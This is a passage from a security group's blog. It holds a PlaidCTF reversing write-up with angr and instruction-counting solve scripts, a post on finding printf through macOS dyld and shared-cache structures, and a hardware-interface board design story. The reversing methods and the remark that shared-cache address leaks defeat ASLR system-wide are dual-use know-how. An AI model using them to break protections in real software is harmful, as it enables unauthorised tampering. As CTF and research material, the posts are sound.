Posts
PlaidCTF 2017 - no_mo_flo writeup (RE)
Can you go with the flow?
no_mo_flo
is a reverse engineering challenge from this year’s PlaidCTF. It’s a 64-bit executable that reads 32 characters from stdin, and tells you if this is the correct flag or not (classic).Opening it in IDA reveals that it takes the input and breaks it into two 16 bytes buffers:
for ( i = 0; i <= 15; ++i ) { v5[i] = buf[2 * i]; v6[i] = buf[2 * i + 1]; }
It will then register a SIGFPE handler and trigger divisions by 0. When triggerred, the handler will emulate jumps depending on $rflags, $r10, and $r11.
The SIGFPE handler looks like this
int __fastcall sigfpe_handler(__int64 a1, siginfo_t *a2, ucontext_t *ctx) { greg_t reg_r11; greg_t reg_eflags; greg_t reg_r10; char *str; if ( custom_flow_enabled ) { reg_r10 = ctx->uc_mcontext.gregs[REG_R10]; reg_eflags = ctx->uc_mcontext.gregs[REG_EFL]; reg_r11 = ctx->uc_mcontext.gregs[REG_R11]; switch ( reg_r11 ) { case CUSTOM_JMP: reg_r11 = custom_jmp(reg_r10); break; case CUSTOM_JNL: reg_r11 = custom_jnl(reg_r10, reg_eflags); break; case CUSTOM_JNG: reg_r11 = custom_jng(reg_r10, reg_eflags); break; case CUSTOM_JG: reg_r11 = custom_jg(reg_r10, reg_eflags); break; case CUSTOM_JL: reg_r11 = custom_jl(reg_r10, reg_eflags); break; case CUSTOM_JNE: reg_r11 = custom_jne(reg_r10, reg_eflags); break; case CUSTOM_JE: reg_r11 = custom_je(reg_r10, reg_eflags); break; default: break; } zero = 1LL; custom_flow_enabled = 0LL; } else { reg_r11 = sigaction(8, 0LL, 0LL); if ( (signed int)reg_r11 < 0 ) { str = strerror(errno); reg_r11 = printf("sigaction install fail %s\n", str); } } return reg_r11; }
As we can see,
$r11
is used as an opcode, and$r10
to store the jump value. If we look at the function called inside the switch, we have a reimplementation of the x86 opcodes, for example with jne:__int64 custom_jne(__int64 reg_r10, __int64 reg_eflags) { if (reg_eflags & X86_EFLAGS_ZF) custom_jmp_to = reg_r10; else custom_jmp_to = custom_jmp_from + 56; return custom_jmp_to; }
The code that triggers the
SIGFPE
handler looks like this:.text:0000000000400F18 check_odd_bytes: ; CODE XREF: main+AA .text:0000000000400F18 sub rsp, 8 .text:0000000000400F1C mov esi, 1 .text:0000000000400F21 mov eax, 0 .text:0000000000400F26 mov edx, eax .text:0000000000400F28 shl edx, 2 .text:0000000000400F2B movsxd rdx, edx .text:0000000000400F2E mov rax, rdi .text:0000000000400F31 add rax, rdx .text:0000000000400F34 mov rdx, rax .text:0000000000400F37 mov eax, [rdx] .text:0000000000400F39 mov edx, eax .text:0000000000400F3B sub edx, 3 .text:0000000000400F3E mov eax, edx .text:0000000000400F40 cmp eax, 40h .text:0000000000400F43 lea r10, check_odd_byte_1 .text:0000000000400F4B mov r11, CUSTOM_JNE .text:0000000000400F52 mov dword ptr ds:custom_flow_enabled, 1 .text:0000000000400F5D mov ds:custom_save_rax, rax .text:0000000000400F65 mov rax, 0 .text:0000000000400F6C mov ds:custom_save_rdx, rdx .text:0000000000400F74 lea rdx, loc_400F7B .text:0000000000400F7B .text:0000000000400F7B loc_400F7B: ; DATA XREF: check_odd_bytes+5C .text:0000000000400F7B mov ds:custom_jmp_from, rdx .text:0000000000400F83 cdq .text:0000000000400F84 idiv ds:zero .text:0000000000400F8C mov ds:zero, 0 .text:0000000000400F98 mov rax, ds:custom_save_rax .text:0000000000400FA0 mov rdx, ds:custom_save_rdx .text:0000000000400FA8 mov r11, ds:custom_jmp_to .text:0000000000400FB0 jmp r11 .text:0000000000400FB3 mov esi, 0 .text:0000000000400FB8 lea r10, check_odd_byte_1 .text:0000000000400FC0 mov r11, CUSTOM_JMP .text:0000000000400FC7 mov dword ptr ds:custom_flow_enabled, 1 .text:0000000000400FD2 mov ds:custom_save_rax, rax .text:0000000000400FDA mov rax, 0 .text:0000000000400FE1 mov ds:custom_save_rdx, rdx .text:0000000000400FE9 lea rdx, loc_400FF0 .text:0000000000400FF0 .text:0000000000400FF0 loc_400FF0: ; DATA XREF: .text:0000000000400FE9 .text:0000000000400FF0 mov ds:custom_jmp_from, rdx .text:0000000000400FF8 cdq .text:0000000000400FF9 idiv ds:zero .text:0000000000401001 mov ds:zero, 0 .text:000000000040100D mov rax, ds:custom_save_rax .text:0000000000401015 mov rdx, ds:custom_save_rdx .text:000000000040101D mov r11, ds:custom_jmp_to .text:0000000000401025 jmp r11
If we look a little inside it, this roughly translates into:
check_odd_bytes: ; CODE XREF: main+AA sub rsp, 8 mov esi, 1 mov eax, 0 mov edx, eax shl edx, 2 movsxd rdx, edx mov rax, rdi add rax, rdx mov rdx, rax mov eax, [rdx] mov edx, eax sub edx, 3 mov eax, edx cmp eax, 40h jne check_odd_byte_1 ; Here is the change mov esi, 0 jmp check_odd_byte_1 ; and the second one
Two main functions will then be called,
sub_4006c6
andsub_400f18
, that will respectively verify the first buffer and the second one. Two nice solving techniques are broken by this scheme: symbolic analysis (like angr) is very hard with stuff like signal handlers and instruction counting is impossible since characters are not checked sequentially (here, they are checked two by two, the even ones, then the odd ones).While gaby was reversing and simplifying the jumps handling to NOP out the divisions by 0 (see above), he figured out that the first function was not using the handler at all. So I tried to launch
angr
on the first function only, and managed to get the first half of the flag like this:#!/usr/bin/env python2 import angr from simuvex.procedures.stubs.UserHook import UserHook p = angr.Project('no_flo_f51e2f24345e094cd2080b7b690f69fb') # You win find = 0x4027ce # You lose main = 0x40272e # Basic blocks that get eax to be reset in the first function # (see get_basic_blocks.py) avoid = (0x4027f8, 0x40071d, 0x40077a, 0x4007d7, 0x400834, 0x400894, 0x4008f4, 0x400950, 0x4009a8, 0x400a09, 0x400a6f, 0x400ac7, 0x400b24, 0x400b81, 0x400bd9, 0x400c31, 0x400c8e, 0x400ce6, 0x400d3e, 0x400d96, 0x400df2, 0x400e4a, 0x400ea0, 0x400eeb) flag_addr = 0 def read(state): state.regs.rax = 32 global flag_addr flag_addr = state.regs.rsi for i in range(31): if i % 2 == 0: # We are interested by the bytes that go into the first function state.mem[state.regs.rsi + i].char = state.se.BVS('c', 8) else: if i > 4 and i < 31: # Other are put to '`' to be computed later with # v0lt (see solve2.py) state.mem[state.regs.rsi + i].char = '`' elif i == 1: state.add_constraints(state.memory.load(flag_addr, 5) == int("PCTF{".encode("hex"), 16)) state.mem[state.regs.rsi + 31].char = '}' def clear_rax(state): state.regs.rax = 0 def do_nothing(state): # There might be an angr builtin # no time to read the docs! pass # sighandler does nothing p.hook(0x4027ba, angr.Hook(UserHook, user_func=do_nothing, length=5)) # read p.hook(0x40274a, angr.Hook(UserHook, user_func=read, length=5)) # second function is completely bypassed for now p.hook(0x4027d1, angr.Hook(UserHook, user_func=clear_rax, length=(0x4027e0 - 0x4027d1))) init = p.factory.blank_state(addr=main) pgp = p.factory.path_group(init) ex = pgp.explore(find=find, avoid=avoid) # Print half the flag to pipe it into v0lt print(ex.found[0].state.se.any_str(ex.found[0].state.memory.load(flag_addr, 32)))
Basic blocks’ addresses from the previous script were dumped from IDA with this:
from idautils import * from bisect import * START = 0x4006c6 END = 0x400f13 # From https://reverseengineering.stackexchange.com/a/1648/11827 class BBWrapper(object): def __init__(self, ea, bb): self.ea_ = ea self.bb_ = bb def get_bb(self): return self.bb_ def __lt__(self, other): return self.ea_ < other.ea_ class BBCache(object): def __init__(self, f): self.bb_cache_ = [] for bb in idaapi.FlowChart(f): self.bb_cache_.append(BBWrapper(bb.startEA, bb)) self.bb_cache_ = sorted(self.bb_cache_) def find_block(self, ea): i = bisect_right(self.bb_cache_, BBWrapper(ea, None)) if i: return self.bb_cache_[i-1].get_bb() else: return None bb_cache = BBCache(idaapi.get_func(START)) for func in Functions(START, END): addr = func while addr < END: disasm = GetDisasm(addr) if "mov" in disasm and "r8d, 0" in disasm: print("{0}".format(hex(bb_cache.find_block(addr).startEA))) decoded = DecodeInstruction(addr) addr += decoded.size if decoded else 1
angr runs for less than 10 seconds and gives us half the flag:
p1kachu@GreenLabOfGazon:no_mo_flow$ ./solve1.py PCTF{`0`f`0`_`0`l`k`_`h`h`l`_`0} p1kachu@GreenLabOfGazon:no_mo_flow$
and now, that we have this, we can “bruteforce” the other half using instruction counting since we will always pass the first check (the even characters)!
Using
v0lt
, we are able to get the second half of the flag:#!/usr/bin/env python3 from v0lt import * # Get half the flag from angr first_half = input() # Create an instruction counting instance that reads from stdin a password # of 32 chars, and try to recover the other half of it ic = InstructionCounter("/home/p1kachu/Desktop/tools/pin/", "/home/p1kachu/no_flo_f51e2f24345e094cd2080b7b690f69fb", binary_args=" &> /dev/null", length=32, input_form=InputForm.STDIN, fixed_chars=first_half) # ¯\_(ツ)_/¯ flag = ic.Accurate();
And, a little while later, the Russian Anthem was played ;)
p1kachu@GreenLabOfGazon:Downloads$ ./solve1.py | ./solve2.py [+]SUCCESS char known: P -> P [+]SUCCESS char known: C -> PC [+]SUCCESS char known: T -> PCT [+]SUCCESS char known: F -> PCTF [+]SUCCESS char known: { -> PCTF{ [+]SUCCESS char guessed: n -> PCTF{n [+]SUCCESS char known: 0 -> PCTF{n0 [+]SUCCESS char guessed: _ -> PCTF{n0_ [+]SUCCESS char known: f -> PCTF{n0_f [+]SUCCESS char guessed: l -> PCTF{n0_fl [+]SUCCESS char known: 0 -> PCTF{n0_fl0 [+]SUCCESS char guessed: ? -> PCTF{n0_fl0? [+]SUCCESS char known: _ -> PCTF{n0_fl0?_ [+]SUCCESS char guessed: m -> PCTF{n0_fl0?_m [+]SUCCESS char known: 0 -> PCTF{n0_fl0?_m0 [+]SUCCESS char guessed: _ -> PCTF{n0_fl0?_m0_ [+]SUCCESS char known: l -> PCTF{n0_fl0?_m0_l [+]SUCCESS char guessed: i -> PCTF{n0_fl0?_m0_li [+]SUCCESS char known: k -> PCTF{n0_fl0?_m0_lik [+]SUCCESS char guessed: e -> PCTF{n0_fl0?_m0_like [+]SUCCESS char known: _ -> PCTF{n0_fl0?_m0_like_ [+]SUCCESS char guessed: a -> PCTF{n0_fl0?_m0_like_a [+]SUCCESS char known: h -> PCTF{n0_fl0?_m0_like_ah [+]SUCCESS char guessed: _ -> PCTF{n0_fl0?_m0_like_ah_ [+]SUCCESS char known: h -> PCTF{n0_fl0?_m0_like_ah_h [+]SUCCESS char guessed: 3 -> PCTF{n0_fl0?_m0_like_ah_h3 [+]SUCCESS char known: l -> PCTF{n0_fl0?_m0_like_ah_h3l [+]SUCCESS char guessed: l -> PCTF{n0_fl0?_m0_like_ah_h3ll [+]SUCCESS char known: _ -> PCTF{n0_fl0?_m0_like_ah_h3ll_ [+]SUCCESS char guessed: n -> PCTF{n0_fl0?_m0_like_ah_h3ll_n [+]SUCCESS char known: 0 -> PCTF{n0_fl0?_m0_like_ah_h3ll_n0 [+]SUCCESS char known: } -> PCTF{n0_fl0?_m0_like_ah_h3ll_n0} [+]SUCCESS pass found: PCTF{n0_fl0?_m0_like_ah_h3ll_n0} p1kachu@GreenLabOfGazon:no_mo_flow$ ./no_flo_f51e2f24345e094cd2080b7b690f69fb PCTF{n0_fl0?_m0_like_ah_h3ll_n0} Good flow!! p1kachu@GreenLabOfGazon:no_mo_flow$
flag: PCTF{n0_fl0?_m0_like_ah_h3ll_n0}
This was nice, because we could clearly see that the binary had been made such that these kind of techniques would not work! Almost no reversing was necessary for this (even if we did a lot before figuring out this). A little bit of hacking never hurts ;) Thanks PPP!
You can find the binary and sripts here
LSE Week 2017 Announcement
For the seventh year, we are going to give a 3 day conference to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
All details are on the main page of the event: LSE Summer Week 2017
Playing with Mach-O binaries and dyld
One cool way to get your hands dirty when discovering something is to try to make it do simple stuff in some stupid/overkill way.
When I first had “fun” with the Linux ELF format, I was told to call printf without using it directly, by finding which address to call from inside the binary. For this, one would start from the mapped program header, find the
r_debug
structure which would give the program’s link map containing the mapped libc’s base address. From it, one would findprintf
by iterating over the library’s symbol table and find where it is, before calling it. No syscall’s allowed, so everything must come from the process’s own memory and structures.Recently I wanted to give a closer look at macOS, and decided to try the same thing with Mach-O binaries. This post will be a sum-up for me to remember, and for anybody that might want to learn anything about macOS in general. I will not re-explain what already exists on other websites, I’ll just link them instead.
Prerequisites
First things first, we are looking for printf, from the libc. To find it, just write a simple program, and open gdb. There are multiple ways to determine which library we are looking for, but using
info sharedlibrary
and determining in which range fallsprintf
is one of the simplest. In our case, we care about/usr/lib/system/libsystem_c.dylib
.This binary is what
file
calls aMach-O universal binary
, which in fact is a wrapper around multiple Mach-Os. Also calledFat binaries
in the old days, they were used to mix x86 and PPC binaries in a single blob. Now, it ships libraries for both 32 and 64 bits architectures.p1kachu@OrangeLabOfSun:osx$ file libsystem_c.dylib help/libsystem_c.dylib: Mach-O universal binary with 2 architectures: [x86_64: Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|NO_REEXPORTED_DYLIBS|APP_EXTENSION_SAFE>] [i386: Mach-O i386 dynamically linked shared library, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|NO_REEXPORTED_DYLIBS|APP_EXTENSION_SAFE>]
A universal binary consists of a fat binary header, and multiple Mach-Os. So we’ll only take a look at one of the Mach-O, the one used by our system (in our case, the first one). Here is, however, an overview of the format:
Finding the libc
In memory will only be mapped the corresponding Mach-O, so that’s what we are going to look for in our process’s address space. We first need to understand how the dynamic linker maps it. Let’s take a look at
/usr/include/mach-o/*
to try to find some informations. The interesting stuff lies intodyld_images.h
andloader.h
. We see that the structuredyld_images.h:dyld_all_image_infos
has two interesting fields: a pointer (infoArray
) to an array ofstruct dyld_image_info
, which gives us every mapped binary in memory, andinfoArrayCount
which gives the number of binaries in the array. We can thus iterate over these structures to find thelibsystem_c.dylib
address in memory.Here are the important parts from
dyld_images.h
(macOS Sierra). Comments have been moved/reduced for more readability.struct dyld_image_info { /* base address image is mapped into */ const struct mach_header* imageLoadAddress; /* path dyld used to load the image */ const char* imageFilePath; /* time_t of image file */ uintptr_t imageFileModDate; // ... }; // ... /* internal limit */ #define DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT 8 struct dyld_all_image_infos { uint32_t version; /* 1 in Mac OS X 10.4 and 10.5 */ uint32_t infoArrayCount; const struct dyld_image_info* infoArray; dyld_image_notifier notification; bool processDetachedFromSharedRegion; /* Mac OS X 10.6, iPhoneOS 2.0 and later */ bool libSystemInitialized; const struct mach_header* dyldImageLoadAddress; /* Mac OS X 10.6, iPhoneOS 3.0 and later */ void* jitInfo; /* Mac OS X 10.6, iPhoneOS 3.0 and later */ const char* dyldVersion; const char* errorMessage; uintptr_t terminationFlags; /* Mac OS X 10.6, iPhoneOS 3.1 and later */ void* coreSymbolicationShmPage; /* Mac OS X 10.6, iPhoneOS 3.1 and later */ uintptr_t systemOrderFlag; /* Mac OS X 10.7, iPhoneOS 3.1 and later */ uintptr_t uuidArrayCount; const struct dyld_uuid_info* uuidArray; /* only images not in dyld shared cache */ /* Mac OS X 10.7, iOS 4.0 and later */ struct dyld_all_image_infos* dyldAllImageInfosAddress; /* Mac OS X 10.7, iOS 4.2 and later */ uintptr_t initialImageCount; /* Mac OS X 10.7, iOS 4.2 and later */ uintptr_t errorKind; const char* errorClientOfDylibPath; const char* errorTargetDylibPath; const char* errorSymbol; /* Mac OS X 10.7, iOS 4.3 and later */ uintptr_t sharedCacheSlide; /* Mac OS X 10.9, iOS 7.0 and later */ uint8_t sharedCacheUUID[16]; /* (macOS 10.12, iOS 10.0 and later */ uintptr_t sharedCacheBaseAddress; uint64_t infoArrayChangeTimestamp; const char* dyldPath; mach_port_t notifyPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; #if __LP64__ uintptr_t reserved[13-(DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT/2)]; #else uintptr_t reserved[12-DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; #endif };
By looking at this structure afterwards, one can notice that other fields from this structure could have been quite useful for our purpose !
However, we first have to find its address in memory. The function
/usr/include/mach/task.h:task_info
does exactly this, but uses amach port
, which is a kernel-provided inter-process communication mechanism. It’s not exactly a syscall, but still, it’s a little bit like cheating. I don’t think there is any reliable way of doing it without (as of Yosemite at least).Phew! We are now able to get the base address of
libsystem_c.dylib
:static char *find_libc(void) { // Get DYLD task infos struct task_dyld_info dyld_info; mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; kern_return_t ret; ret = task_info(mach_task_self_, TASK_DYLD_INFO, (task_info_t)&dyld_info, &count); if (ret != KERN_SUCCESS) { return NULL; } // Get image array's size and address mach_vm_address_t image_infos = dyld_info.all_image_info_addr; struct dyld_all_image_infos *infos; infos = (struct dyld_all_image_infos *)image_infos; uint32_t image_count = infos->infoArrayCount; struct dyld_image_info *image_array = infos->infoArray; // Find libsystem_c.dylib among them struct dyld_image_info *image; for (int i = 0; i < image_count; ++i) { image = image_array + i; // Find libsystem_c.dylib's load address if (strstr(image->imageFilePath, "libsystem_c.dylib")) { return (char*)image->imageLoadAddress; } } }
Getting printf
Right. So now we have the binary in memory, let’s finally take a look at the Mach-O format. A good introduction has already been written here, so let’s not dive in too deep and directly look for what interests us, accessing the symbol table. Thus, we are looking for the
LC_SYMTAB
command, which will give us the strtab and symtab offsets on which we will iterate to find printf.The process of looking up the name of a given entry in the lazy or non-lazy pointer tables looks like this:
Analysing it with jtool gives us an overview on what we are supposed to find:
p1kachu@OrangeLabOfSun:osx$ ./jtool.ELF64 -arch x86_64 -l libsystem_c.dylib [...] LC 05: LC_SYMTAB Symbol table is at offset 0x9da70 (645744), 2372 entries String table is at offset 0xa7708 (685832), 32264 bytes [...]
However, the values recovered from memory are quite different:
P1kachu@GreyLabOfSteel:~/D/L/W/c/osx$ ./get_symcmd symoff: 0x134596ef stroff: 0x141ad9f4
And then began the
SIGSEGV
ballet. Something was definitely off.The shared cache
Let’s take a step back in late 2009, with iOS 3.1. One change in the way iOS handled libraries was introduced by the mean of the
Dyld shared cache
, which combines all system (private and public) libraries into a big cache file to improve performance. On macOS, the same thing happened. The shared caches live in/private/var/db/dyld/
and regroups a lot of libraries (~400 for Yosemite and ~670 for Sierra, as for the x86_64 versions). The file format isn’t documented and changes between versions, so we must trick a little bit. Some informations about it can be retrieved using jtool again:p1kachu@OrangeLabOfSun:osx$ ./jtool.ELF64 -h dyld_shared_cache_x86_64h_yosemite File is a shared cache containing 414 images (use -l to list) Header size: 0x70 bytes Got gap of -8 bytes: 3 mappings starting from 0x68. 414 Images starting from 0xc8 mapping r-x/r-x 251MB 7fff80000000 -> 7fff8fb31000 (0-fb31000) mapping rw-/rw- 38MB 7fff70000000 -> 7fff72604000 (fb31000-12135000) mapping r--/r-- 75MB 7fff8fb31000 -> 7fff9466d000 (12135000-16c71000) DYLD base address: 7fff5fc00000 Local Symbols: 0x0-0x0 (0 bytes) Code Signature: 0x16c71000-0x16e38a07 (1866247 bytes) Slide info: 0x16ba7000-0x16c71000 (827392 bytes) Slide Info version 1, TOC offset: 24, count 9732, entries: 6309 of size 128 p1kachu@OrangeLabOfSun:osx$ ./jtool.ELF64 -h dyld_shared_cache_x86_64h_sierra File is a shared cache containing 675 images (use -l to list) Header size: 0x70 bytes Got gap of 40 bytes: 0xf8 0x00 0x00 0x00 0x00 0x00 0x5790 0x00 0x29d 0x00 3 mappings starting from 0x98. 675 Images starting from 0xf8 mapping r-x/r-x 424MB 7fff70000000 -> 7fff8a824000 (0-1a824000) mapping rw-/rw- 75MB 7fff8e824000 -> 7fff933a7000 (1a824000-1f3a7000) mapping r--/r-- 118MB 7fff973a7000 -> 7fff9ea3c000 (1f3a7000-26a3c000) DYLD base address: 0 Local Symbols: 0x0-0x0 (0 bytes) Code Signature: 0x26a3c000-0x26f14000 (5079040 bytes) Slide info: 0x1f3a7000-0x1f3b1000 (40960 bytes) Slide Info version 2, TOC offset: 4096, count 40, entries: 38702 of size 0
Memory layout subtlety
On Yosemite (and probably other versions that I didn’t look at), the cache memory mapping differs from the file layout: as can be seen using jtool’s output above, the
TEXT
mapping is after theDATA
, while it is the opposite in the file layout. This was put back to normal between Yosemite and Sierra.DYLD SHARED CACHE MAPPINGS ON YOSEMITE * ======================================== (*): Without ASLR slide ---------------------- 0x7fff70000000 | | | | | | | | | RW- | | | | | | | |----------------------| 0x7fff70000000 + [RW-].size | Junk | |----------------------| 0x7fff80000000 | Cache Header | |----------------------| | | | R-X | | | | ... | | libsystem_c.dylib | | ... | | | | | |----------------------| 0x7fff80000000 + [R-X].size | | | | | | | R-- | | | | | | | | | ---------------------- 0x7fff80000000 + [R-X].size + [R--].size cache.base = [R-X].address + [R-X].size - [R--].offset
Among these cached libraries is our
libsystem_c
, and thus we simply understand that the {str,sym}tabs offsets are from the beginning of the cache file.Finding it on Yosemite was not trivial without issuing syscalls, and I thus went for the stupid way: I first found the loaded library with the smallest load address (the first one contained in the shared cache), and got back into memory until finding the shared cache magic string (
dyld_v1 x86_64\0
).On Sierra, however, one can observe that the
dyld_all_image_infos
structure contains a nice field namedsharedCacheBaseAddress
. I used it to avoidmemcmp
ing more memory.With this, we can find the symtab, iterate over each of them and check the corresponding strings, looking for
_printf
.Conclusion
The final code, compatible with at least Yosemite and Sierra, is available here.
I may have skipped some informations. I read way too much from different sources to be able to put everything down. If anything is unclear, feel free to ping me by mail or twitter.
Interesting auxilliary stuff
Shared cache and ASLR
The shared cache is loaded in memory at boot and is the same for every process. Even if affected by ASLR, it will not be re-randomized on a per program basis, and thus any program leaking addresses from it actually leaks system-wide addresses, which is nice!
Links
- Code for calling printf
- Slides of the corresponding Lightning talk
- Dynamic Symbol table duel - ELF vs Mach-O
- Mach-O executables
/usr/include/mach-o/*
One Device to drive them all
Prologue
Three Devices for logic analysis of passively captured traces,
Seven for inter-chip communication driven by hardwired interfaces,
Nine for in-circuit debugging limited to specific purpose,
One for complex hardware hacking scenarios.Three tinkerers took those words as they are. Overthrown by the complexity implied by the multiplicity of inefficient tools, they thought that time had come to undertake this problem from another angle.
All they needed was a simple way to manipulate the exotic devices that they required for their projects. Manufactured by foreign organizations, devices referred here were designed to fulfill a predefined purpose and were intended to be used as black boxes. Without any knowledge of the internal mechanisms involved in their operations, it was conceivable to integrate them if they were in the kind of environment that they were promised to.
But those tinkerers though differently. Their situation was mostly complicated by the fact that they had already acquired a good control of their personal computers that they considered as their main and perfect workstation. Well defined and roughly understood, they were too stubborn to learn another way to work as they unanimously decided that this method was the most effective and compliant with the rest of their work.
So instead of reworking there methodology, they agreed that defining a third device whose only purpose was to handle the interfacing between the workstation and the device under test were inescapable. The first member of the group asked to others what options were available to fit this position.
The second one said that he already made an intensive usage of the Arduino for that. Providing an easy access and control of its GPIO and some hardwired bus controllers, it was suitable for the most simple cases.
The third one discussed the merits of the Bus Pirate from Dangerous Prototype. Mature and widely-used, this tool provided a direct control of its interface via USB without the need to develop a specific firmware to be actually used.
The first one replied to these proposals that they had a common issue: they simply performed the communication with the host by using an interface based on the translation of USB to UART speeded at 115200 bauds. For him, it prohibited a fine-grained configuration and then limited the full capacities provided by the USB protocol.
They all agreed on this last point and started to work on a first prototype of their response to this situation.
It was based on a STM32F072 microcontroller and mapped SPI, I2C, UART and CAN signals to physical headers. As this chip was able to drive USB signals, a USB mini-connector was directly connected to it.
Concerning the software side, one interesting idea here was to expose the hardware interfaces using the corresponding subsystem in the Linux kernel. Even though these subsystems were mostly used to describe on-chip interfaces, adapting them to wrap up the USB functions was feasible. For instance, the SPI exposed by the device could be manipulated as a regular spidev.
Although the concept of such board was appealing at the time, limitations quickly appeared. First of all, most of the USB protocol had to be implemented via software on the STM32F072 which led to a significant overhead on each USB transaction. Secondly, fully implementing the host driver in kernel space implied a rigid configuration and error-prone if not implemented correctly. Finally, the global stability of the STM32F072 MCU was quite poor especially during a development phase where on-chip debugging had to be frequently used.
One year passed and no one was actually enthusiastic to use this dead-born project in a real context. The first one, whose credibility was at its lower point, got the bravery to propose to the two others to rethink the project from the beginning. And they accepted, against all odds.
This write-up must be considered as the collection of thoughts that led them to the design and the manufacture of a second version of this small, unpretentious, and unfinished electronic board.
Chapter I: Forging the One Device
The first step for them was to clearly define how and what could make the second version of the board better than the previous one. The main issue was related to the lack of flexibility of the design and they wondered how they could handle a protocol not supported by the microcontroller they used.
Then they decided to take a look at the wide range of Programmable Logic Devices available nowadays. As a first prototype, a CPLD appeared to be the best choice for such application. Compared to a regular FPGA, these non-volatile PLD were cheaper and required a much more simpler configuration circuit. They also thought that the prototype was designed to only prove a concept and moving to a more powerful FPGA for next versions was conceivable.
Section I: From Ink…
From a high-level point of view, the board had been specified to expose a reasonable number of IOs directly connected to a controller, here an Altera Max V CPLD. As the flaky soft USB implementation of the previous version was quite inconvenient to maintain and to keep reliable, the job here had been assigned to a well-known and solid dedicated USB controller: the FX2LP from Cypress Semiconductor. This highly integrated USB 2.0 microcontroller implemented most of the protocol logic in silicon and only burdened its integrated 8051’s firmware with the high-level configuration aspect of USB.
And then came the question about the communication between the USB controller and the IO controller. The FX2LP embedded a powerful mechanism to forward the content of a USB entrypoint to an hardware FIFO without any interaction with the internal 8051. These EP buffer’s words could then be dequeued by an external component using an hardware interface.
However, this one was defined by a 16-bit data bus and 6 control signals which was quite pin-consuming for the CPLD they chose. Fortunately, another mechanisms offered by the FX2LP allowed the programming of a custom protocol to transmit and receive these data with the external world: the General Programmable Interface. As for the regular FIFO interface, this hardware unit was almost completely independent from the 8051. The firmware was only responsible to program the hardware state-machines used to represent the waveforms of a one-word transmission.
In their case, they chose to allocate 8 wires for the bidirectional data bus, 3 control signals driven by the USB controller and 2 ‘ready’ signals initiated by the IO controller. At that point, none of them had actually thought about the exact shape of the waveforms and the purpose of the control signals but planned to consider that once the first board would be fully manufactured.
The USB device interface was composed of 3 endpoints. The endpoint 0 acted as a regular control endpoint and was used to transfer small requests. Meanwhile, endpoints 2 and 6 were dedicated to bulk transmissions and receptions respectively. The two last were directly connected to the internal FIFO while the first one was completely handled by the 8051.
To power these components, the 5V supplied by the USB were firstly shifted to 3.3V using a low-dropout voltage regulator to power the USB controller and the IO banks of the CPLD while a 1.8V regulator powered the CPLD’s internal logic.
The main clock was managed by the FX2LP. Connected to a 24MHz crystal, the internal PLL were configured by the 8051 firmware allowing a CPU clock frequency of 48MHz, 24MHz or 12MHz. As the output of the phase-locked loop was also exposed outside the USB controller by the CLKOUT pin, the CPLD used it as a system clock.
The GPIF unit had a dedicated clock that could be fed internally or imposed by an external device. All operations on this interface were aligned to this signal. In order to avoid to deal with multiple clock domains in the CPLD, they arranged to drive the IFCLK signal from the IO controller at the half frequency of the system clock.
An I2C EEPROM had been connected to USB controller in order to store its firmware in a persistent way. The internal reset logic of the FX2LP was designed to scan the I2C bus for EEPROM from where a valid firmware could be loaded. Once the program was fully copied to internal RAM, no operations were performed on this bus.
After several tries, they finally validated the following schematic:
Section II: …To Copper
Once the design approved, the next step consisted to draw the printed circuit board. Two layers were enough to route the entire netlist in a surface of 5x5cm.
The top layer was dedicated to voltage regulation, CPLD, connectors and a couple of switches and LEDs. Meanwhile, the bottom one contained the whole circuit required to make the USB controller working: crystal, EEPROM, I2C pull-up resistors, …
IOs from the CPLD were exposed via 2 dual-row 20-pin female headers of 2.54mm pitch.
As the board was manually soldered, it was not conceivable for them to use BGA components for this prototype. So the 100-pin LQFP version of the CPLD had been used as well as the 56-pin SSOP package of the Cypress’s chip.
After hours of painful electrical tests, a first sample of a fully soldered board was born by the end of the Spring:
Chapter II: On Reprogrammability They Hoped
Although the physical board was ready, a firmware was still needed to make it working. The situation was more complex than just a simple binary located in a single ROM as most of the boards of this category are.
First of all, the firmware for the FX2LP had been implemented which basically consisted to configure the USB and the GPIF units of the chip. Nothing uncommon here: writing applications for this kind of microcontroller was quite easy as it was well-documented and that tons of similar usages of this chip already existed and were publicly available. The code has been written in a couple of hours and no new features have been added since as they decided to make the firmware serving only one unique purpose: translate USB data to IO controller in the most simple and lightweight way.
For them, most of the customizations that would be needed should be fully-implemented at the IO controller level. The real challenge here was to take advantage of the CPLD as a powerful and programmable IO controller.
One solution would be to base the CPLD’s design on a soft-processor: modifying IO’s behaviour would mean loading a new firmware into its RAM. Although this architecture was quite common when using an FPGA, it became more inconvenient when basing it on a CPLD due to the lack of memory blocks.
The second solution would be to generate and configure the design of the CPLD according to the user’s needs dynamically. As pursuing this concept using a regular hardware description language seemed almost impossible for them, they decided to fully base the design generation on Migen. This python module allowed the meta-programming of synchronous register transfer level design and handled the generation of a verilog file that could then be synthesised by the regular Altera’s toolchain.
Section I: Modularity And Modulation
They fully defined the architecture around the concept of modularity. To demonstrate how it would transpire in a real context, they took the example of a Pulse-Width Modulation interface.
The main principal of such technique was to use a rectangular pulse wave whose pulse width was modulated resulting in the variation of the average value of the waveform.
A possible implementation of a PWM module could be achieved by using a counter whose width defined the period of the signal and a digital comparator to generate the needed duty cycle.
In this case, the only signal that was likely exposed externally would be the output of the comparator, negated or not. Moreover, a ‘parameter’ of this circuit would be the left-input of the comparator and was typically the kind of signal that would be interesting to implement as a register writable from the host.
For their example, they also considered that the counter value could be watched from the host.
The ‘parameter’ signals were called ‘Control Registers’ and were intended to be readable and/or writable from the host while the signals that would be eligible to be mapped to a physical pin of the CPLD were called ‘IO Signals’.
In a more generic way, this kind of module, that they called ‘IO Module’, could always be represented according to the following template:
-
An internal logic block that could contain both combinational and sequential logic left to IO Module’s discretion.
-
‘Control Registers’ connected to an internal bus and used to watch and control the activity of the internal logic from the host.
-
‘IO Signals’ intended to interact with an external component and to be mapped to real pin.
